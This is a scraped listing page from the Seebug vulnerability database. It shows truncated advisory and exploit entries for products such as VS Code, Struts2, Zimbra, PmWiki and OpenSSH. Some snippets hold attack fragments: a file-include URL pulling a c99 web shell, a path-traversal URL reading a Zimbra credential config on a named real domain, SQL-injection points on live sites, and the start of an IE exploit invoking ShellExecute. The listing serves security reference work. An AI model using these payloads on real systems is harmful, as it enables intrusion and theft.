Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2018/03/26 12:0 a.m.137 views

Visual Studio Code remote code execution vulnerability

I occasionally noticed that Visual Studio Code was listening on a fixed TCP port 9333. After upgrading to 1.19.3, it’s gone. ➜ netstat -an | grep 9333 tcp4 0 0 127.0.0.1.9333 . LISTEN Looks like it’s a bug that affects VSCode 1.19.01.19.2. Extension process always run in debug mode, because of th...

7.3AI score
Exploits0
seebug.org
seebug.org
added 2016/03/16 12:0 a.m.137 views

泛微OA系统 /mobile/plugin/loadWfGraph.jsp 等3处 SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/12/30 12:0 a.m.137 views

Python多个安全漏洞

CVE ID:CVE-2013-1752、CVE-2013-4238 Python是一款开放源代码的脚本编程语言。 Python存在多个安全漏洞,允许远程攻击者利用漏洞进行伪造攻击和进行拒绝服务攻击。 1,Python SSL模块没有正确处理服务器SSL证书中的"subjectAltNames"通用名的空字节,允许攻击者通过中间人攻击进行服务器伪造攻击,可获取敏感信息。 2,不受限的调用Lib/httplib.py中的"readline"可导致消耗大量内存资源,造成拒绝服务攻击。 3,不受限的调用Lib/ftplib.py中的"readline"可导致消耗大量内存资源,造成拒绝服务攻击。...

4.3CVSS8.3AI score0.05347EPSS
Exploits1
seebug.org
seebug.org
added 2018/05/16 12:0 a.m.136 views

DHCP Client Script Code Execution Vulnerability(CVE-2018-1111)

Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client dhclient packages in Red Hat Enterprise Linux 6 and 7. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands...

0.6AI score0.94457EPSS
Exploits14
seebug.org
seebug.org
added 2017/09/07 12:0 a.m.136 views

Apache Struts2 S2-053 (CVE-2017-12611)

0x00 基本信息 漏洞编号:S2-053(CVE-2017-12611) 漏洞影响:远程代码执行 影响版本:Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10 漏洞修复:升级至最新版本 0x01 环境搭建 先用struts-2.3.33搭一个freemarker的简单项目(官方推荐的min-lib中就带了freemarker-2.3.22.jar,不用再额外去找了),就用漏洞公告里给的那个写法 运行后,未发现效果 表着急,我们用的是hidden,看看源代码 根据经验,应该是二次解析造成的漏洞,验证一下 0x02 构造POC...

7.5CVSS9.2AI score0.8802EPSS
Exploits6
seebug.org
seebug.org
added 2017/03/06 12:0 a.m.136 views

IE Godmode remote code execution vulnerability, CVE-2014-6332)

No description provided by source. alliedve.htm // alliewin95+ie3-win10+ie11 dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 // function runmumaa On Error Resume Next set shell=createobject"Shell.Application" shell.ShellExecute...

9.3CVSS8.8AI score0.94996EPSS
Exploits39
seebug.org
seebug.org
added 2016/05/31 12:0 a.m.136 views

XYCMS教育培训建站系统 v1.9 xyzp_detail.asp等多处 SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/02/18 12:0 a.m.136 views

MVPower CCTV Cameras 漏洞

漏洞演示 默认的Web管理接口登录账号 通过默认的帐号admin和空密码能够通过Web管理接口成功登录: 登录后,可以进行实时的图像监控,系统设置等: Web管理接口登录绕过 根据原文描述,Web管理接口登录的认证仅仅是在前端(js/cookie.js)验证了请求Cookie中是否存在“dvrcamcnt”、”dvruser”、”dvrpwd”这三个值: 通过直接在请求中设置对应Cookie值即可正常访问控制后台: 其中dvrcamcnt指的是页面上实时监控画面的数量。 内置未授权访问Shell...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.136 views

Linux ARM - Local Root Exploit

No description provided by source. / Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282. Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable. You need to customize the...

7.2CVSS0.39711EPSS
Exploits9
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.136 views

Easy Online Shop SQL Injection Vulnerability

No description provided by source. ----------------------------Information------------------------------------------------ +Name : Easy Online Shop = SQL injection Vulnerability Proof of Concept +Autor : Easy Laster +Date : 17.12.2010 +Script : Easy Online Shop +Vendor : http://www.mhproducts.de/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/10/20 12:0 a.m.136 views

Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

Oracle是一款大型的商业数据库系统。 Oracle 10g中由SYS用户运行的DBMSEXPORTEXTENSION存储过程存在PL/SQL注入漏洞,允许低权限用户以DBA权限执行任意SQL代码。 Oracle声称已在2006年4月的紧急补丁更新中修复了这个漏洞,但实际上并未修复。 Oracle10g 10.2.0.2.0 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: 删除DBMSEXPORTEXTENSION的PUBLIC执行权限。 厂商补丁: Oracle ------...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/09/25 12:0 a.m.136 views

Mozilla Firefox/SeaMonkey/Thunderbird多个远程漏洞

BUGTRAQ ID: 31346 CVE ID: CVE-2008-3837 CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4063 CVE-2008-4064 CVE-2008-4065 CVE-2008-4066 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 CVE-2008-3836 CVE-2008-3835 CVE-2008-0016 CNCVE ID:CNCVE-20083837 CNCVE-20084058...

10CVSS0.5AI score0.43921EPSS
Exploits15
seebug.org
seebug.org
added 2007/03/12 12:0 a.m.136 views

WordPress AdminPanel CSRF/XSS - 0day

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +---------------------------------------------------------------------------+ SaMuschie Research Labs proudly presents . . . | +---------------------------------------------------------------------------+ Application...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/10/28 12:0 a.m.136 views

Microsoft Infotech存储库itss.dll堆破坏漏洞

Microsoft Windows是微软发布的非常流行的操作系统。 Microsoft Infotech存储系统库(itss.dll)是用于处理CHM/ITS格式文件的函数库。Microsoft将CHM文件归为危险的文件,类似于可执行文件。但攻击者可以通过诱骗用户反编译恶意的CHM文件触发itss.dll中的堆溢出漏洞,导致执行任意代码。 请注意如果用户反编译了恶意的CHM文件,即使没有打开该文件也可以触发这个漏洞。 Microsoft Windows XP SP2 Microsoft Windows XP SP1 Microsoft Windows 2000...

7AI score
Exploits0
seebug.org
seebug.org
added 2017/09/19 12:0 a.m.135 views

ARM Mbedtls x509 ECDSA invalid public key Remote Code Execution Vulnerability(CVE-2017-2784)

Summary An exploitable free of a stack pointer vulnerability exists in the x509 certificate parsing code of ARM mbedTLS 2.4.0. A specially crafted x509 certificate, when parsed by mbedTLS library, can cause an invalid free of a stack pointer leading to a potential remote code execution. In order ...

6.8CVSS8.7AI score0.0339EPSS
Exploits2
seebug.org
seebug.org
added 2015/01/22 12:0 a.m.135 views

U-Mail邮件系统一处接口漏洞(可sql注入,任意用户登陆,获取管理员密码)

简要描述: 用户量这么多的邮件系统,分分钟钟就被getshell是件很令人头疼的事情。 详细说明: 1.邮件系统介绍 1)官方下载地址:http://www.comingchina.com/html/downloads/ 2)版本:最新版V9.8.57 3)测试环境:Windows Server 2003+IIS6.0+官方默认软件 4)使用案例:http://www.comingchina.com/html/case/ OR Google "Powered by U-Mail" 漏洞代码 附600多url下载 链接: http://pan.baidu.com/s/1nQRzo 密码:...

7.2AI score
Exploits0
seebug.org
seebug.org
added 2014/09/12 12:0 a.m.135 views

F5 BIG-IP SSH 私钥泄露漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.135 views

Shellcode Checksum Routine

No description provided by source. ;Exploit Title: Shellcode Checksum Routine ;Date: Sept 1 2010 ;Author: dijital1 ;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm ;Tested on: Omelet Hunter Shellcode in MSF...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.135 views

Scripts Genie Top Sites (out.php, id param) - SQL Injection Vulnerability

No description provided by source. / / / \ / / / / / / / / / / / // / / / / / / // / // / / / / | // / / / / / // / / / // / /,// /////,// ///// , / // Top Sites Script, SQL Injection Vulnerabilities Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=topsitescript...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/03/25 12:0 a.m.136 views

IBM Cognos Express敏感信息泄漏漏洞

Bugtraq ID:66361 CVE ID:CVE-2013-5445 IBM Cognos Express是一款为满足中型企业的需求而构建的商业智能和计划集成解决方案。 IBM Cognos Express存在未明安全漏洞,远程攻击者可以利用漏洞获取服务器上的加密验证凭据。 0 IBM Cognos Express 10.2.1 IBM Cognos Express 10.1 IBM Cognos Express 9.5 IBM Cognos Express 9.0 用户可参考如下厂商提供的安全公告获取补丁以修复该漏洞:...

5CVSS6.6AI score0.01181EPSS
Exploits1
seebug.org
seebug.org
added 2013/01/17 12:0 a.m.135 views

Oracle MySQL Server 'Server'子组件远程安全漏洞(CVE-2012-0574)

BUGTRAQ ID: 57414 CVECAN ID: CVE-2012-0574 Oracle MySQL Server是一个小型关系型数据库管理系统。 Oracle MySQL Server 5.1.66、5.5.28及更早版本存在远程安全漏洞,此漏洞可通过'MySQL Protocol'协议加以利用,'Server'子组件受到影响。通过身份验证的远程攻击者可利用此漏洞造成影响可用性。 0 Oracle MySQL Server = 5.5.28 Oracle MySQL Server = 5.1.66 厂商补丁: Oracle ------...

4CVSS0.4AI score0.02829EPSS
Exploits1
seebug.org
seebug.org
added 2012/03/02 12:0 a.m.135 views

Linux kernel 2.6.x 'net/bridge/br_multicast.c'本地拒绝服务漏洞(CVE-2011-0716)

BUGTRAQ ID: 46433 CVE ID: CVE-2011-0716 Linux Kernel是Linux操作系统的内核。 Linux Kernel在实现上存在本地拒绝服务漏洞,攻击者可利用此漏洞造成内核崩溃、拒绝服务合法用户 0 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.kernel.org/...

4.7CVSS0.2AI score0.00368EPSS
Exploits1
seebug.org
seebug.org
added 2010/01/19 12:0 a.m.135 views

搜狗输入法绕过锁屏保护漏洞

搜狗输入法是在中国广泛使用的拼音输入法。 当用户登录到Windows系统并加载了搜狗输入法后,锁屏(cltr+alt+del)再切换到该输入法,在输入法的工具栏中输入任意内容后点击“搜索”就会调用iexplorer.exe。如果登录账号属于管理员组,就可以直接在IE地址栏中进入system32目录并运行cmd。 SOGOU.COM 搜狗输入法 4.3 - Microsoft Windows 7 ultimate 厂商补丁: SOGOU.COM --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2009/05/01 12:0 a.m.135 views

Symantec杀毒软件Intel LANDesk Common Base Agent服务任意代码执行漏洞

BUGTRAQ ID: 34671 CVECAN ID: CVE-2009-1429 Symantec AntiVirus是非常流行的杀毒解决方案。 Symantec杀毒软件产品的Intel LANDesk Common Base Agent(CBA)服务中存在安全漏洞。如果远程攻击者向TCP 12174端口发送了恶意报文以向CreateProcessA函数传送恶意参数的话,就会导致以SYSTEM权限执行任意代码。 Symantec Client Security 3.1 Symantec Client Security 3.0 Symantec Client Security 2.0...

10CVSS6.4AI score0.8793EPSS
Exploits8
seebug.org
seebug.org
added 2007/04/03 12:0 a.m.135 views

PHP sqlite_udf_decode_binary()函数缓冲区溢出漏洞

PHP是一款广泛使用的WEB开发脚本语言。 PHP sqliteudfdecodebinary存在缓冲区溢出,远程攻击者可利用此漏洞以应用程序进程权限执行任意指令。 sqliteudfdecodebinary函数不正确处理非法字符串,当传递字符串只包含单个\x01字符会调用sqlitedecodebinary使用空字符串作为参数,但这个API函数不支持,它需要调用的字符串长度至少为1: int sqlitedecodebinaryconst unsigned char in, unsigned char out int i, e; unsigned char c; e = in++; i...

6.8AI score
Exploits0
seebug.org
seebug.org
added 2017/12/14 12:0 a.m.134 views

Palo Alto Networks firewalls remote root code execution(CVE-2017-15944)

This is a public advisory for CVE-2017-15944 which is a remote root code execution bug in Palo Alto Networks firewalls. Three separate bugs can be used together to remotely execute commands as root through the web management interface without authentication on: PAN-OS 6.1.18 and earlier, PAN-OS...

7.5CVSS0.9834EPSS
Exploits13
seebug.org
seebug.org
added 2017/10/19 12:0 a.m.134 views

Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution(CVE-2017-12629)

First Vulnerability: XML External Entity Expansion deftype=xmlparser Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query. The problem is that lucene x...

7.5CVSS10.4AI score0.91896EPSS
Exploits11
seebug.org
seebug.org
added 2016/05/05 12:0 a.m.134 views

74cms v3.6 任意密码重置漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/10/12 12:0 a.m.135 views

通达OA /interface/auth.php SQL注入

通达OA 两处注入点: /interface/auth.php /general/score/flow/scoredate/result.php 主要原因还是由于宽字符导致的。 MYSQL的字符集转换过程 1. MySQL Server收到请求时将请求数据从charactersetclient转换为charactersetconnection; 2. 进行内部操作前将请求数据从charactersetconnection转换为内部操作字符集,其确定方法如下: • 使用每个数据字段的CHARACTER SET设定值; • 若上述值不存在,则使用对应数据表的DEFAULT CHARACTER...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.134 views

PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit

No description provided by source. ?php / ------------------------------------------------------------- PmWiki = 2.2.34 pagelist Remote PHP Code Injection Exploit ------------------------------------------------------------- author...............: Egidio Romano aka EgiX mail.................:...

7.5CVSS0.2AI score0.5341EPSS
Exploits12
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.134 views

Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit

No description provided by source. lame Dovecot IMAP 1.0.10 - 1.1rc3 Exploit Here's an exploit for the recent TAB vulnerability in Dovecot. It's nothing special since in the wild there are few to none targets because of the special option which has to be set. see CVE Entry CVE-2008-1218 Exploit...

6.8CVSS0.1AI score0.07342EPSS
Exploits6
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.134 views

Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server 1. Advisory Information Title: Dnsmasq Heap Overflow and...

6.8CVSS6.8AI score0.12684EPSS
Exploits8
seebug.org
seebug.org
added 2012/06/23 12:0 a.m.134 views

webSPELL Dailyinput Movie-Addon ‘portal’参数SQL注入漏洞

BUGTRAQ ID: 53904 webSPELL是一款基于WEB的内容管理程序。 webSPELL dailyinput Movie-addon中存在SQL注入漏洞,该漏洞源于未对用户提供的数据充分的验证即用在SQL查询中。攻击者可利用该漏洞操控应用程序,访问或修改数据,或在底层数据库中利用该漏洞。 0 webSPELL 厂商补丁: webSPELL -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://cms.webspell.org/...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2009/02/16 12:0 a.m.134 views

IBM HTTP Server mod_proxy_ftp 跨站脚本漏洞

BUGTRAQ ID: CVE ID:CVE-2008-2939 CNCVE ID:CNCVE-20082939 IBM HTTP Server是一款HTTP服务程序。 IBM HTTP Server "modproxyftp"存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 目前没有详细解决方案提供。 IBM HTTP Server 6.0.x 厂商解决方案 可参考如下安全公告获得补丁信息: http://www-01.ibm.com/support/docview.wss?uid=swg27007033...

4.3CVSS7.7AI score0.38953EPSS
Exploits4
seebug.org
seebug.org
added 2009/02/10 12:0 a.m.134 views

TightVNC Authentication Failure Integer Overflow PoC

No description provided by source. !/usr/bin/env python [email protected] Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388 import socket serversocket = socket.socketsocket.AFINET, socket.SOCKSTREAM serversocket.bind'', 5900...

10CVSS6.5AI score0.13334EPSS
Exploits11
seebug.org
seebug.org
added 2009/02/02 12:0 a.m.134 views

Fujitsu Systemcast Wizard Lite PXE请求远程溢出漏洞

BUGTRAQ ID: 33342 Systemcast Wizard Lite是用于创建富士通PRIMEQUEST服务器系统的支持软件。 Systemcast Wizard Lite的PXEService服务监听PXE协议请求。入站报文被拷贝到了0x400字节的固定缓冲区,但传送给recvfrom的参数长度为0x5DC,因此如果远程攻击者发送了超过0x400字节的特制upd报文的话,就可以触发溢出,导致执行任意指令。 Fujitsu Systemcast Wizard Lite = 2.0 Fujitsu ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2007/02/14 12:0 a.m.134 views

Portable OpenSSH &lt;= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit

No description provided by source. !/bin/bash $Id: raptorsshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ raptorsshtime - OpenSSH remote timing attack exploit Copyright c 2006 Marco Ivaldi [email protected] OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately ...

5CVSS7AI score0.76751EPSS
Exploits10
seebug.org
seebug.org
added 2006/12/10 12:0 a.m.134 views

SaveWebPortal Page参数远程文件包含漏洞

SaveWebPortal是一款基于PHP的WEB应用程序。 SaveWebPortal不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'index.php'脚本对用户提交的'page'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 circeOS SaveWebPortal 3.4 http://www.circeos.it/ http://www.example.com/index.php?page=http://www.example2.com/c99.php.txt...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/08 12:0 a.m.134 views

多个DuWare产品Detail.ASP SQL注入漏洞

DuWare是基于ASP的WEB应用程序。 DuWare多个产品不充分过滤用户提交的URI输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。 问题是'detail.ASP'脚本对用户提交的'itype'参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息。 DUware DUpaypal Pro 3.1 DUware DUpaypal Pro 3.0 DUware DUpaypal 3.1 DUware DUpaypal 3.0 DUware DUnews 1.1 DUware DUnews 1.0 DUware DUdownload 1.1...

7AI score
Exploits0
seebug.org
seebug.org
added 2006/11/07 12:0 a.m.134 views

Cyberfolio &lt;= 2.0 RC1 (av) Remote File Include Vulnerabilities

No description provided by source. \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV58$2006 ----------------------------------------------------------------------------------------------- ECHOADV58$2006Cyberfolio =2.0 RC1 $av Remote File Inclusion...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/08/17 12:0 a.m.134 views

Apache Mod_SSL可定制错误文档拒绝服务漏洞

BUGTRAQ ID: 16152 CVECAN ID: CVE-2005-3357 ModSSL是Apache服务器上的SSL实现,用来为Apache Web服务器提供加密支持。 在某些配置情况下Apache的ModSSL存在拒绝服务器,远程攻击者可能利用此漏洞导致Apache服务器的拒绝服务。 此拒绝服务漏洞是一个可能的空指针废弃问题引起的,当Apache被配置成支持对代码400错误可定制ErrorDocument时可触发此漏洞,远程攻击者可导致Apache进程或线程崩溃,持继性的攻击可以使Apache失去响应。 Apache Group Apache 2.x 临时解决方法:...

5.4CVSS0.1AI score0.24286EPSS
Exploits1
seebug.org
seebug.org
added 2021/06/14 12:0 a.m.133 views

Joomla 存储型XSS漏洞(CVE-2021-26032)

JOOMLA PASSWORD RESET VULNERABILITY AND A STORED XSS FOR FULL COMPROMISE Intro Joomla is one of the most popular CMS-es with over 1.5 million installations world-wide. We pentested Joomla 3.9.24 and found a password reset vulnerability which we chained with a set of vulnerabilities and features t...

4.3CVSS6.5AI score0.0098EPSS
Exploits1
seebug.org
seebug.org
added 2017/11/15 12:0 a.m.133 views

Xplico Unauthenticated Remote Code Execution(CVE-2017-16666)

The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email POP, IMAP, and SMTP protocols, all HTTP contents, each VoIP call SIP, FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is ...

9.9AI score0.80098EPSS
Exploits7
seebug.org
seebug.org
added 2017/06/27 12:0 a.m.133 views

Microsoft Windows Uniscribe Remote Code Execution Vulnerability(CVE-2017-0283)

We have encountered a crash in the Windows Uniscribe user-mode library, in the memmove function called by USP10!MergeLigRecords, while trying to display text using a corrupted font file: --- 4e0.6dc: Access violation - code c0000005 first chance First chance exceptions are reported before any...

9.3CVSS8.7AI score0.42546EPSS
Exploits5
seebug.org
seebug.org
added 2015/01/06 12:0 a.m.133 views

用友NC-IUFO系统通用SQL注入

简要描述: rt 详细说明: 有人提交了,就顺手来看看 漏洞文件:core/public/singleplandetail.jsp 漏洞参数:pk=1012F41000000000WA2V 漏洞类型:SQL注入漏洞(GET型) 影响用户: 收集几个案例,方便测试 http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/12/11 12:0 a.m.133 views

金蝶随手网科技网 Zimbra新漏洞

简要描述: 这是对新漏洞的一次实例测试,目前自己没尝试使用漏洞。 详细说明: 漏洞证明: exp估计可以直接添加管理员帐号,未敢验证。cncert可自行尝试 EXP也在zone帖子里 http://mail.feidee.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=0 91214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/12/11 12:0 a.m.133 views

Oracle MySQL/MariaDB 不安全Salt生成安全绕过漏洞(CVE-2012-5627)

Bugtraq ID:56837 CVE ID:CVE-2012-5627 MySQL是一款开源关系型数据库管理系统。MariaDB是一个采用Maria存储引擎的MySQL分支版本。 MySQL处理密码salt值存在漏洞,当用户登录MySQL时,会生成Salt值用于防止密码猜测攻击。此salt值在会话开始时创建并用于整个会话,如果通过验证的攻击者使用MySQL "changeuser"命令尝试以其他用户登录,由于Salt已知,可导致密码猜测更有效率。 0 MySQL 5.5.19及其他版本 MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66 MariaDB...

4CVSS5.8AI score0.11413EPSS
Exploits2
seebug.org
seebug.org
added 2009/12/23 12:0 a.m.133 views

php 4.4.5 代码执行漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/10/05 12:0 a.m.133 views

Apache终端转义序列过滤漏洞

CVECAN ID: CVE-2003-0083 Apache是一款广泛使用的开放源代码WEB服务程序。 Apache对日志中的转义序列处理存在问题,攻击者可能利用恶意的日志信息在服务器执行任意命令。 Apache无法过滤错误日志中以ASCII(0x1B)序列开始且带有一系列参数的终端转义序列。如果攻击者能够向Apache错误日志中注入转义序列的话,就可能对远程用户发动各种攻击,包括拒绝服务,文件修改和执行任意命令。 Apache Group Apache 1.3.9 Apache Group Apache 1.3.6 Apache Group Apache 1.3.4 Apache...

5CVSS6.4AI score0.17413EPSS
Exploits8
seebug.org
seebug.org
added 2007/05/18 12:0 a.m.133 views

WordPress Akismet插件未明漏洞

WordPress是一款基于WEB的网络日志应用程序。 使用在WordPress的Akismet插件不正确处理用户提交的输入,远程攻击者可以利用漏洞获得敏感信息。 目前没有详细漏洞细节提供。 WordPress 2.1.3 目前没有解决方案提供: http://wordpress.org/...

7.1AI score
Exploits0
Total number of security vulnerabilities5000